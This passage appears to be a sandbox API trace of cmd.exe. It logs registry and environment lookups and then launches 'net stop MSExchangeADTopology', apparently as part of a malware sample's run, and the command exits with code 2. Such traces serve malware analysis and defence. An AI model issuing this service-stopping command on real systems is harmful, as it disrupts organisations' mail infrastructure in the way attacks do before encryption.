AllocationBase=0x45a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0142.720] GetConsoleOutputCP () returned 0x1b5 [0142.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0142.720] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0142.720] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.720] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0142.720] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.720] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0142.720] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.721] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0142.721] _get_osfhandle (_FileHandle=0) returned 0x38 [0142.721] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0142.721] _get_osfhandle (_FileHandle=0) returned 0x38 [0142.722] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0142.722] GetEnvironmentStringsW () returned 0x4637d78* [0142.722] FreeEnvironmentStringsA (penv="A") returned 1 [0142.722] GetEnvironmentStringsW () returned 0x4637d78* [0142.722] FreeEnvironmentStringsA (penv="A") returned 1 [0142.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459eb34 | out: phkResult=0x459eb34*=0x94) returned 0x0 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x0, lpData=0x459eb40*=0xc8, lpcbData=0x459eb3c*=0x1000) returned 0x2 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x1, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x0, lpData=0x459eb40*=0x1, lpcbData=0x459eb3c*=0x1000) returned 0x2 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x0, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x40, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x40, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x0, lpData=0x459eb40*=0x40, lpcbData=0x459eb3c*=0x1000) returned 0x2 [0142.722] RegCloseKey (hKey=0x94) returned 0x0 [0142.722] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x459eb34 | out: phkResult=0x459eb34*=0x94) returned 0x0 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x0, lpData=0x459eb40*=0x40, lpcbData=0x459eb3c*=0x1000) returned 0x2 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x1, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x0, lpData=0x459eb40*=0x1, lpcbData=0x459eb3c*=0x1000) returned 0x2 [0142.722] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x0, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.723] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x9, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.723] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x4, lpData=0x459eb40*=0x9, lpcbData=0x459eb3c*=0x4) returned 0x0 [0142.723] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x459eb38, lpData=0x459eb40, lpcbData=0x459eb3c*=0x1000 | out: lpType=0x459eb38*=0x0, lpData=0x459eb40*=0x9, lpcbData=0x459eb3c*=0x1000) returned 0x2 [0142.723] RegCloseKey (hKey=0x94) returned 0x0 [0142.723] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983f [0142.723] srand (_Seed=0x5ad2983f) [0142.723] GetCommandLineW () returned="/c net stop MSExchangeADTopology\"" [0142.723] GetCommandLineW () returned="/c net stop MSExchangeADTopology\"" [0142.723] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0142.723] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4639cd0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0142.723] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0142.723] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.723] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.723] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.723] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.723] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.723] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.723] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.723] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.723] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.723] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0142.723] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.723] GetEnvironmentStringsW () returned 0x4637d78* [0142.723] FreeEnvironmentStringsA (penv="A") returned 1 [0142.723] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.723] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.723] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.724] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.724] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0142.724] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0142.724] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.724] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.724] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.724] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.724] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x459f90c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0142.724] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x459f90c, lpFilePart=0x459f904 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459f904*="Desktop") returned 0x1d [0142.724] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0142.724] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x459f688 | out: lpFindFileData=0x459f688) returned 0x46305c8 [0142.724] FindClose (in: hFindFile=0x46305c8 | out: hFindFile=0x46305c8) returned 1 [0142.724] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x459f688 | out: lpFindFileData=0x459f688) returned 0x46305c8 [0142.724] FindClose (in: hFindFile=0x46305c8 | out: hFindFile=0x46305c8) returned 1 [0142.724] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0142.724] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x459f688 | out: lpFindFileData=0x459f688) returned 0x46305c8 [0142.724] FindClose (in: hFindFile=0x46305c8 | out: hFindFile=0x46305c8) returned 1 [0142.724] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0142.724] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0142.724] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0142.724] GetEnvironmentStringsW () returned 0x4637d78* [0142.725] FreeEnvironmentStringsA (penv="=") returned 1 [0142.725] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0142.725] GetConsoleOutputCP () returned 0x1b5 [0142.725] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0142.725] GetUserDefaultLCID () returned 0x409 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x459fa3c, cchData=128 | out: lpLCData="0") returned 2 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x459fa3c, cchData=128 | out: lpLCData="0") returned 2 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x459fa3c, cchData=128 | out: lpLCData="1") returned 2 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0142.725] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0142.726] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0142.726] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0142.726] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0142.726] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.726] GetConsoleTitleW (in: lpConsoleTitle=0x463a9f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0142.727] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0142.727] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0142.727] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0142.727] _wcsicmp (_String1="net", _String2=")") returned 69 [0142.727] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0142.727] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0142.727] _wcsicmp (_String1="IF", _String2="net") returned -5 [0142.727] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0142.727] _wcsicmp (_String1="REM", _String2="net") returned 4 [0142.727] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0142.728] GetConsoleTitleW (in: lpConsoleTitle=0x459f728, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.728] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0142.728] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0142.728] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0142.728] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0142.728] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0142.728] _wcsicmp (_String1="net", _String2="CD") returned 11 [0142.728] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0142.728] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0142.728] _wcsicmp (_String1="net", _String2="REN") returned -4 [0142.728] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0142.728] _wcsicmp (_String1="net", _String2="SET") returned -5 [0142.728] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0142.728] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0142.728] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0142.728] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0142.729] _wcsicmp (_String1="net", _String2="MD") returned 1 [0142.729] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0142.729] _wcsicmp (_String1="net", _String2="RD") returned -4 [0142.729] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0142.729] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0142.729] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0142.729] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0142.729] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0142.729] _wcsicmp (_String1="net", _String2="VER") returned -8 [0142.729] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0142.729] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0142.729] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0142.729] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0142.729] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0142.729] _wcsicmp (_String1="net", _String2="START") returned -5 [0142.729] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0142.729] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0142.729] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0142.729] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0142.729] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0142.729] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0142.729] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0142.729] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0142.729] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0142.729] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0142.729] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0142.729] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0142.729] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0142.729] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="CD") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0142.729] _wcsicmp (_String1="net", _String2="REN") returned -4 [0142.729] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0142.729] _wcsicmp (_String1="net", _String2="SET") returned -5 [0142.729] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0142.729] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0142.729] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0142.729] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0142.729] _wcsicmp (_String1="net", _String2="MD") returned 1 [0142.729] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0142.729] _wcsicmp (_String1="net", _String2="RD") returned -4 [0142.729] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0142.729] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0142.729] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0142.729] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0142.729] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0142.729] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0142.729] _wcsicmp (_String1="net", _String2="VER") returned -8 [0142.729] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0142.729] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0142.729] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0142.730] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0142.730] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0142.730] _wcsicmp (_String1="net", _String2="START") returned -5 [0142.730] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0142.730] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0142.730] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0142.730] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0142.730] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0142.730] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0142.730] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0142.730] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0142.730] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0142.730] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0142.730] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0142.730] _wcsicmp (_String1="net", _String2="IF") returned 5 [0142.730] _wcsicmp (_String1="net", _String2="REM") returned -4 [0142.730] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0142.730] SetErrorMode (uMode=0x0) returned 0x0 [0142.730] SetErrorMode (uMode=0x1) returned 0x0 [0142.730] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46305d0, lpFilePart=0x459f234 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x459f234*="Desktop") returned 0x1d [0142.730] SetErrorMode (uMode=0x0) returned 0x1 [0142.730] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0142.730] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0142.738] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0142.738] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0142.738] GetConsoleTitleW (in: lpConsoleTitle=0x459f4b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.738] InitializeProcThreadAttributeList (in: lpAttributeList=0x459f3e0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x459f3c4 | out: lpAttributeList=0x459f3e0, lpSize=0x459f3c4) returned 1 [0142.738] UpdateProcThreadAttribute (in: lpAttributeList=0x459f3e0, dwFlags=0x0, Attribute=0x60001, lpValue=0x459f3cc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x459f3e0, lpPreviousValue=0x0) returned 1 [0142.738] GetStartupInfoW (in: lpStartupInfo=0x459f418 | out: lpStartupInfo=0x459f418*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0142.738] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.739] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.739] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0142.740] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeADTopology\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x459f368*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeADTopology\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x459f3b4 | out: lpCommandLine="net stop MSExchangeADTopology\"", lpProcessInformation=0x459f3b4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x354, dwThreadId=0xdf4)) returned 1 [0142.745] CloseHandle (hObject=0xa4) returned 1 [0142.745] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0142.745] GetEnvironmentStringsW () returned 0x4639ee0* [0142.745] FreeEnvironmentStringsA (penv="=") returned 1 [0142.745] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0142.857] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x459f34c | out: lpExitCode=0x459f34c*=0x2) returned 1 [0142.857] CloseHandle (hObject=0xa8) returned 1 [0142.857] _vsnwprintf (in: _Buffer=0x459f434, _BufferCount=0x13, _Format="%08X", _ArgList=0x459f354 | out: _Buffer="00000002") returned 8 [0142.857] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0142.857] GetEnvironmentStringsW () returned 0x4637d78* [0142.857] FreeEnvironmentStringsA (penv="=") returned 1 [0142.857] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0142.857] GetEnvironmentStringsW () returned 0x4637d78* [0142.857] FreeEnvironmentStringsA (penv="=") returned 1 [0142.857] DeleteProcThreadAttributeList (in: lpAttributeList=0x459f3e0 | out: lpAttributeList=0x459f3e0) [0142.857] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.857] SetConsoleMode (hConsoleHandle=0x3c, 